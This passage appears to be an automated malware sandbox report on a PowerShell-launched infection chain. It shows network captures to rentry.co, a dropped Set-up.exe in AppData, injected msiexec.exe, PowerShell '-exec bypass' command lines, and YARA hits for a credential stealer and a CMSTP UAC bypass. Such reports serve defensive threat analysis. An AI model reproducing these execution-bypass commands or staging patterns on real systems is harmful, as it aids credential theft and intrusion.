                                                                                            CF-RAY: 8e80c26bf9578c36-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=984&delivery_rate=1450571&cwnd=162&unsent_bytes=0&cid=a6f851d992af0723&ts=732&x=0"
                                                                                            2024-11-25 09:54:48 UTC126INData Raw: 37 38 0d 0a 6a 53 6b 32 4d 4b 56 42 41 73 6e 32 77 6f 4a 75 31 6c 51 4a 46 50 30 65 30 66 61 73 45 55 4b 41 4a 46 57 33 42 4d 44 70 59 78 48 57 55 68 52 46 68 33 73 67 6f 59 4b 32 38 68 33 73 43 43 5a 49 30 6d 79 30 6d 4e 68 6a 4f 36 35 48 4f 75 73 72 70 6f 77 4d 5a 4f 68 65 55 77 58 35 62 6e 43 6f 67 65 43 75 54 4c 41 67 4b 79 37 50 4d 76 4f 54 6a 69 74 79 2f 58 6b 3d 0d 0a
                                                                                            Data Ascii: 78jSk2MKVBAsn2woJu1lQJFP0e0fasEUKAJFW3BMDpYxHWUhRFh3sgoYK28h3sCCZI0my0mNhjO65HOusrpowMZOheUwX5bnCogeCuTLAgKy7PMvOTjity/Xk=
                                                                                            2024-11-25 09:54:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.449761172.67.75.404432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:50 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Host: rentry.co
                                                                                            2024-11-25 09:54:50 UTC1279INHTTP/1.1 403 Forbidden
                                                                                            Date: Mon, 25 Nov 2024 09:54:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 8771
                                                                                            Connection: close
                                                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                            Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Resource-Policy: same-origin
                                                                                            Origin-Agent-Cluster: ?1
                                                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                            Referrer-Policy: same-origin
                                                                                            X-Content-Options: nosniff
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            cf-mitigated: challenge
                                                                                            2024-11-25 09:54:50 UTC889INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 48 67 6a 36 78 70 6a 2f 51 68 6a 73 73 2f 61 47 51 70 31 2b 71 37 76 4a 4c 37 6c 62 57 2b 49 73 5a 47 2f 71 71 6f 5a 52 34 6e 5a 77 7a 37 42 69 39 43 74 73 71 6b 32 52 45 46 32 48 61 6b 56 4f 76 55 66 47 54 4c 47 32 45 68 49 75 42 51 64 37 61 31 62 70 2f 42 54 7a 55 4f 32 64 56 37 62 6b 31 2f 4d 35 32 46 35 34 47 70 55 5a 6b 4a 42 38 73 58 4f 67 65 7a 58 7a 4a 35 39 39 69 42 67 72 2b 7a 6a 2f 47 56 6f 67 79 37 4f 52 4e 36 59 4c 36 65 68 34 6b 41 3d 3d 24 73 66 65 6b 66 39 36 36 54 52 6e 6d 4b 64 63 6b 43 68 38 78 63 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                            Data Ascii: cf-chl-out: Hgj6xpj/Qhjss/aGQp1+q7vJL7lbW+IsZG/qqoZR4nZwz7Bi9Ctsqk2REF2HakVOvUfGTLG2EhIuBQd7a1bp/BTzUO2dV7bk1/M52F54GpUZkJB8sXOgezXzJ599iBgr+zj/GVogy7ORN6YL6eh4kA==$sfekf966TRnmKdckCh8xcA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                                                            2024-11-25 09:54:50 UTC570INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                                            2024-11-25 09:54:50 UTC1369INData Raw: 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a
                                                                                            Data Ascii: oe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:
                                                                                            2024-11-25 09:54:50 UTC1369INData Raw: 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 72 65 6e 74 72 79 2e 63 6f 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 38 30 63 32 37 39 34 38 61 39 30 66 37 33 27 2c 63 48 3a 20 27 73 53 49 4e 52 4a 44 72 61 77 6b 6e 33 66 56 33 46 70 6c 46 4e 32 71 71 45 6d 59 75 66 32 5f 6e 79 58 5f 6c 68 62 77 5a 4a 50 34 2d 31 37 33 32 35 32 38 34 39 30 2d 31 2e 32 2e 31 2e 31 2d 47 2e 41 6f 76 69 2e 44 37 56 72 62 4f 4c 79 45 5f 69 4c 67 42 6c 73 50 32 41 51 55 4f 31 74 48 2e 79 78 4f 76 68 71 68 44 7a 54 66 50 48 78
                                                                                            Data Ascii: </div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "rentry.co",cType: 'managed',cRay: '8e80c27948a90f73',cH: 'sSINRJDrawkn3fV3FplFN2qqEmYuf2_nyX_lhbwZJP4-1732528490-1.2.1.1-G.Aovi.D7VrbOLyE_iLgBlsP2AQUO1tH.yxOvhqhDzTfPHx
                                                                                            2024-11-25 09:54:50 UTC1369INData Raw: 32 6d 52 6a 34 50 73 76 30 64 46 78 63 4b 6e 69 66 34 52 33 5f 49 53 31 44 44 72 55 6b 4e 67 41 54 51 62 33 59 38 55 79 4b 6f 54 32 71 6b 62 54 72 38 70 2e 6c 6b 35 51 2e 55 4a 36 67 4f 76 4a 43 72 63 55 64 30 53 42 52 68 5a 6e 6d 55 42 4e 53 72 46 66 62 44 4a 74 32 62 57 2e 4b 53 55 44 33 41 5f 70 62 55 68 46 49 6e 4e 4b 74 70 37 70 6f 54 78 74 4e 4f 50 4c 44 76 69 51 36 79 6f 48 6b 48 4f 31 7a 43 30 31 47 44 4c 46 75 67 4a 42 33 34 35 6b 38 4c 5a 6e 37 4c 51 4f 2e 71 43 64 56 46 69 77 73 5a 6f 4f 41 6d 48 67 73 74 38 65 65 76 2e 31 67 6a 74 33 32 31 4c 65 66 58 59 37 38 58 54 77 4d 50 55 64 70 67 74 58 46 61 4b 78 4d 51 67 50 54 4b 57 75 32 6f 42 4e 70 45 45 45 65 44 45 43 36 49 34 31 36 48 75 42 30 45 34 52 49 39 61 47 4d 47 6f 5a 50 42 4f 38 56 39 38
                                                                                            Data Ascii: 2mRj4Psv0dFxcKnif4R3_IS1DDrUkNgATQb3Y8UyKoT2qkbTr8p.lk5Q.UJ6gOvJCrcUd0SBRhZnmUBNSrFfbDJt2bW.KSUD3A_pbUhFInNKtp7poTxtNOPLDviQ6yoHkHO1zC01GDLFugJB345k8LZn7LQO.qCdVFiwsZoOAmHgst8eev.1gjt321LefXY78XTwMPUdpgtXFaKxMQgPTKWu2oBNpEEEeDEC6I416HuB0E4RI9aGMGoZPBO8V98
                                                                                            2024-11-25 09:54:50 UTC1369INData Raw: 62 4a 58 6c 6d 4d 53 4b 5a 32 77 45 42 37 64 66 34 56 42 77 39 4f 72 48 36 2e 33 4b 31 43 50 78 4e 56 35 42 61 69 4e 78 6c 70 5a 4d 46 6a 6a 4a 57 4e 7a 6c 6d 47 49 52 4b 46 36 78 70 72 4d 32 62 2e 31 53 63 63 68 49 51 79 79 38 67 42 2e 38 75 76 73 70 43 66 46 61 45 68 68 31 37 75 75 69 72 55 6c 55 57 4c 6f 52 57 2e 71 4a 56 2e 59 42 77 61 42 6a 53 72 46 45 61 35 78 50 77 4f 39 6a 44 42 65 66 42 4a 64 55 6d 65 6a 4b 5f 31 67 77 51 69 65 65 74 35 59 76 52 74 42 62 6d 56 75 44 56 56 39 6d 44 46 47 62 41 30 6f 41 4e 35 48 6a 74 5a 5f 57 63 46 36 58 5a 39 47 57 38 4f 71 55 43 45 48 65 4c 72 68 32 77 6d 6c 6b 61 33 37 78 53 50 61 30 6b 4a 4b 62 61 67 66 5a 5a 76 73 56 74 6c 66 5a 63 4d 34 77 46 47 45 47 67 73 4b 48 57 4d 37 6c 6d 58 72 37 6b 45 5a 56 31 59 74
                                                                                            Data Ascii: bJXlmMSKZ2wEB7df4VBw9OrH6.3K1CPxNV5BaiNxlpZMFjjJWNzlmGIRKF6xprM2b.1ScchIQyy8gB.8uvspCfFaEhh17uuirUlUWLoRW.qJV.YBwaBjSrFEa5xPwO9jDBefBJdUmejK_1gwQieet5YvRtBbmVuDVV9mDFGbA0oAN5HjtZ_WcF6XZ9GW8OqUCEHeLrh2wmlka37xSPa0kJKbagfZZvsVtlfZcM4wFGEGgsKHWM7lmXr7kEZV1Yt
                                                                                            2024-11-25 09:54:50 UTC1369INData Raw: 67 45 69 5f 44 33 48 6d 58 57 6a 68 64 36 33 74 66 47 76 62 54 44 4b 63 49 6e 56 38 74 4c 69 45 64 68 6a 6c 4f 44 41 67 33 4e 73 31 63 49 51 6c 54 31 4b 61 33 5a 6d 2e 32 76 64 36 4d 4b 37 67 45 69 50 53 65 58 4c 44 78 74 34 75 6c 66 41 57 5a 59 46 77 75 2e 55 53 43 58 48 62 37 5f 6b 41 44 2e 67 33 70 68 46 41 63 2e 54 41 52 46 51 39 6d 73 49 68 50 77 58 4a 41 37 51 34 72 52 6e 76 30 6e 75 6b 49 72 6f 5a 69 39 78 73 30 76 4d 46 4d 74 36 53 7a 56 66 39 42 52 33 74 45 55 72 5f 45 46 48 4a 6a 4f 6a 48 53 39 58 30 6f 4e 36 4a 56 48 74 35 47 37 42 57 73 46 34 46 57 62 52 51 30 78 46 6a 75 67 2e 59 72 51 4b 54 46 4f 78 4b 44 39 57 6b 59 62 45 36 7a 4b 66 32 72 50 46 69 6b 4f 41 30 73 30 33 33 59 33 41 47 6c 69 4d 78 65 56 58 79 4e 6f 45 70 2e 57 4d 2e 54 70 65
                                                                                            Data Ascii: gEi_D3HmXWjhd63tfGvbTDKcInV8tLiEdhjlODAg3Ns1cIQlT1Ka3Zm.2vd6MK7gEiPSeXLDxt4ulfAWZYFwu.USCXHb7_kAD.g3phFAc.TARFQ9msIhPwXJA7Q4rRnv0nukIroZi9xs0vMFMt6SzVf9BR3tEUr_EFHJjOjHS9X0oN6JVHt5G7BWsF4FWbRQ0xFjug.YrQKTFOxKD9WkYbE6zKf2rPFikOA0s033Y3AGliMxeVXyNoEp.WM.Tpe
                                                                                            2024-11-25 09:54:50 UTC1356INData Raw: 67 63 6c 4d 78 75 4d 7a 46 67 46 72 46 39 63 34 30 57 4a 35 2e 6c 4e 7a 41 35 36 6b 75 4b 53 78 44 68 63 38 31 75 70 5f 71 37 43 52 39 54 37 30 50 5a 66 46 67 4d 35 69 62 67 33 34 4d 39 45 30 73 36 6a 76 68 5a 4a 74 55 6f 58 62 38 54 35 36 54 68 54 34 33 6d 62 59 37 65 4b 4c 33 4e 52 75 4f 55 56 33 52 43 4b 30 4a 38 65 70 54 6d 57 5a 34 37 73 53 34 49 6f 41 75 33 4d 38 72 7a 6a 57 33 33 34 74 6b 4d 71 58 32 52 36 4e 43 47 4d 69 6a 72 42 42 31 6c 71 42 44 6f 78 76 78 65 57 31 76 4e 32 6f 47 4a 4d 63 46 71 56 35 44 36 49 6b 64 30 6f 41 69 75 4e 74 32 63 38 72 76 56 6f 47 34 4d 4b 4b 69 6d 67 42 30 4c 48 6f 51 54 34 75 6e 59 50 41 75 52 76 54 30 68 5f 4e 63 48 51 73 35 71 4e 7a 32 68 72 45 66 5f 69 65 58 54 76 56 54 4b 30 6b 72 48 6a 75 46 74 51 61 78 35 71
                                                                                            Data Ascii: gclMxuMzFgFrF9c40WJ5.lNzA56kuKSxDhc81up_q7CR9T70PZfFgM5ibg34M9E0s6jvhZJtUoXb8T56ThT43mbY7eKL3NRuOUV3RCK0J8epTmWZ47sS4IoAu3M8rzjW334tkMqX2R6NCGMijrBB1lqBDoxvxeW1vN2oGJMcFqV5D6Ikd0oAiuNt2c8rvVoG4MKKimgB0LHoQT4unYPAuRvT0h_NcHQs5qNz2hrEf_ieXTvVTK0krHjuFtQax5q


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:04:53:42
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1"
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:04:53:42
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:04:54:07
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                                                                                            Imagebase:0x7e0000
                                                                                            File size:6'487'736 bytes
                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:04:54:13
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                            Imagebase:0x420000
                                                                                            File size:24'576 bytes
                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:04:54:13
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:04:54:16
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                                                                                            Imagebase:0x7e0000
                                                                                            File size:6'487'736 bytes
                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:04:54:21
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Imagebase:0xdf0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2177293553.0000000003427000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2238461589.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2199449864.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2238430241.0000000003428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2226006098.0000000003424000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2351954654.0000000005194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2152637778.0000000003428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2199967273.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2152329165.0000000003425000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:04:54:22
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                            Imagebase:0x420000
                                                                                            File size:24'576 bytes
                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2192626392.0000000004397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:04:54:23
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:04:54:24
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                                                                                            Imagebase:0x7e0000
                                                                                            File size:6'487'736 bytes
                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2162484499.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:04:54:30
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Imagebase:0xdf0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2192707284.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:04:54:49
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1"
                                                                                            Imagebase:0x200000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:04:54:49
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:0.1%
                                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                                              Signature Coverage:1.5%
                                                                                              Total number of Nodes:200
                                                                                              Total number of Limit Nodes:3
